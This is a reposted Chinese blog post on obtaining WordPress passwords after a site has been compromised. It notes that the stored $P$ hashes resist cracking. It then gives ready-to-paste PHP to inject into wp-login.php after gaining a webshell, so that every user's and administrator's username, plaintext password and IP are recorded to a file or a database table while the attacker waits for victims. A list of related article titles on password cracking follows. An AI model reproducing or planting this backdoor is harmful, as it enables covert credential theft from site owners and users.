wordpress密码的破解
出處:http://blog.csdn.net/yiyefangzhou24/article/details/8727946
wordpress这种CMS国外用的非常多,安全性还是不错的,跟新快,看到这种东西,除了管理员架好之后就托管的垃圾站,持续更新的wordpress还是很让人头疼的。
如果通过某种方法拿下了webshell,***之后会发现wp_user这个wordpress这个用户表,里面的密码加密方法还是让人绝望的,我大概找了找这方面的资料发现他的加密方法如下(此处引用):
WordPress系统的用户密码是保存在wp_users数据表的user_pass字段,密码是通过Portable PHP password hashing framework类产生的,密码的形式是随机且不可逆,同一个明文的密码在不同时间,产生的密文也不一样,相对来说较为安全。
WordPress用户密码产生的过程是,当需要生成用户密码的时候,随机产生了一个salt,然后将salt和password相加,又进行了count次md5,最后和encode64的hash数值累加,就得到了一个以$P$开头的密码,这个密码每次产生的结果都不一样。
对于这种密码破解基本无望,在旧版本的wordpress中会有这样一个方法可能取得明文密码,***到本地,本地搭建wordpress,还原wordpress。然后修改管理员邮箱,点击忘记密码,理论上wordpress会将明文密码发到管理员的邮箱,所以取得明文密码。但可能本菜鸟才疏学浅,不能知道是哪个版本有这样一个漏洞。或者究竟有没有不可考。并且这种加密算法不可逆,wordpress如何从密文本身还原出明文发送到administrator的邮箱的?想不通。难道存放了明文密码?呵呵。。。
所以就有了另一种思路,直接截获明文密码,我们有webshell的时候,只要权限够大(一般修改权限还是有的)。我们可以修改wordpress本身的脚本,本文修改wordpress中的wp-login.php实现只要有人从后台登录就能记录下鞥如的密码,也包括管理员的。
用webshell搜索wp-login.php中的这样一个关键字 !is_wp_error($user)的上一行之后增加脚本:
[php] view plaincopy
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n";
if($log_user&&$log_pwd&&$log_ip){
@fwrite(fopen('pwd.txt',"a+"),$txt);
}
密码写入同目录的pwd.txt,但是很多时候php没有写入权限,没关系,我们可以直接写入数据库,前提是你要获得数据库的连接密码,这个不用我说,大家都知道,然后建立一张表将截获的数据写进去。脚本如下
[php] view plaincopy
$success=!is_wp_error($user) && !$reauth;
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$connect = mysql_connect("localhost", "用户名", "密码");
mysql_select_db("数据库",$connect);
mysql_query("set names utf8");
$sql="insert into 表 values('$success','$log_user','$log_pwd','$log_ip')";
$res=mysql_query($sql,$connect);
下面的事情就是漫长的等待,等待登入者上钩。
此方法有一定的风险,脚本需本地测试好,否则可能造成wordpress奔溃。
转载于:https://blog.51cto.com/3838120958/1609561
wordpress密码的破解相关推荐
- 玩转代码|WordPress防止暴力破解管理员密码
目录 一.author页面地址 1.在主题代码里实现 2.通过.htaccess文件添加301重定 二.xmlrpc.php 1.攻击方式 2.原理分析 3.防护建议 三. wordpress 后台默 ...
- 无线密码离线破解工具Pyrit常用命令集合大学霸IT达人
无线密码离线破解工具Pyrit常用命令集合大学霸IT达人 Pyrit是一款可以使用GPU加速的无线密码离线破解工具.该工具提供了大量的命令,可以用来实现不同的功能.使用Pyrit工具中的命令,可以通过 ...
- iphone如何查看wifi密码_WIFI密码如何破解
WIFI密码如何破解?最无奈的事情莫过于有WiFi却不知道WiFi密码,下面给大家介绍几个方法,教你百分之百成功蹭网. 手机上面破解WiFi蹭网 教你百分之百成功蹭网方法一:默认密码大猜想 以下为常见 ...
- linux密码暴力破解之SHA-512破解
linux密码暴力破解 由于MD5加密已经发展了很多年,现在市面上已经积累了大量的MD5数据,这样,MD5的安全性也就受到了威胁,所以,从centos6.x版本开始,系统密码开始采用SHA-512加密 ...
- 电信级的RSA加密后的密码的破解方法
一直以来,电信通过HTTP劫持推送广告的方式已经存在了很多年了,这种手段至今并未停止.这种手段月光博客曾经有多次曝光,见<电信级的网络弹出广告>.<获取了电信恶意弹出广告的罪证> ...
- 浅谈IC卡密码的破解方法
IC(MIFARE 1)卡密码的破解本人总结有两种方式: 一.软破 条件是熟悉任意一种编程语言,读写卡器一个,IC卡若干张即可开始破密之路,采用软破的方法,一般只要3-5分钟即可算出IC卡的A.B密码 ...
- IC卡密码的破解方法浅谈
IC(MIFARE 1)卡密码的破解本人总结有两种方式: 一.软破 条件是熟悉任意一种编程语言,读写卡器一个,IC卡若干张即可开始破密之路,采用软破的方法,一般只要3-5分钟即可算出IC卡的A.B密码 ...
- SSH密码暴力破解及防御实战
前言:本文对目前流行的 SSH 密码暴力破解工具进行实战研究.分析和总结,对渗透攻击测试和安全防御具有一定的参考价值. 首先介绍几款常用的ssh暴力破解工具: 1. hydra [海德拉] 指定用户破 ...
- kali中无线密码的破解
无线密码的破解 1,前期工作 a,我们在虚拟机要用usb的外置无线网卡,最好使用比较有名气的. b,在服务中启动vmware usb ar service服务. c, ...
最新文章
- 3D Computer Grapihcs Using OpenGL - 04 First Triangle
- 嵌入式设备web服务器比较
- Vb Shell 打开程序 等待运行完毕后再继续
- gradle创建web工程_Gradle入门:创建Web应用程序项目
- 网钛CMS PHP版蓝色响应式UI美化模板
- Sql Server cdc变更捕获使用
- 数字校园项目-学生失联预警系统(二)-----项目部署
- 横幅新年促销海报PSD模板,拯救年底节日忙
- 2018年5月14日第4课—文件隐藏权限、特殊权限、find命令等
- ubuntu 创建桌面图标快捷方式
- Mac快速解压zip文件的两种方法
- 答网友问:如何按月进行统计公司采购进货、销售出库信息?
- HDFS中JAVA API的使用
- 关于网页编码的故事,你都清楚嘛?utf与gbk的关系
- 戴顿大学计算机科学,(出国) 2015年 清北 上海交大浙大复旦中科南大 世界TOP30高校 官方数据...
- 完美:利用旧版iCloud更改Apple ID地区
- 09 conventional exercise
- C r e a t e P r o c e s s的b I n h e r i t H a n d l e s参数
- UE5神通--POI解决方案
- 6、Spring MVC 之 定义@RequestMapping处理方法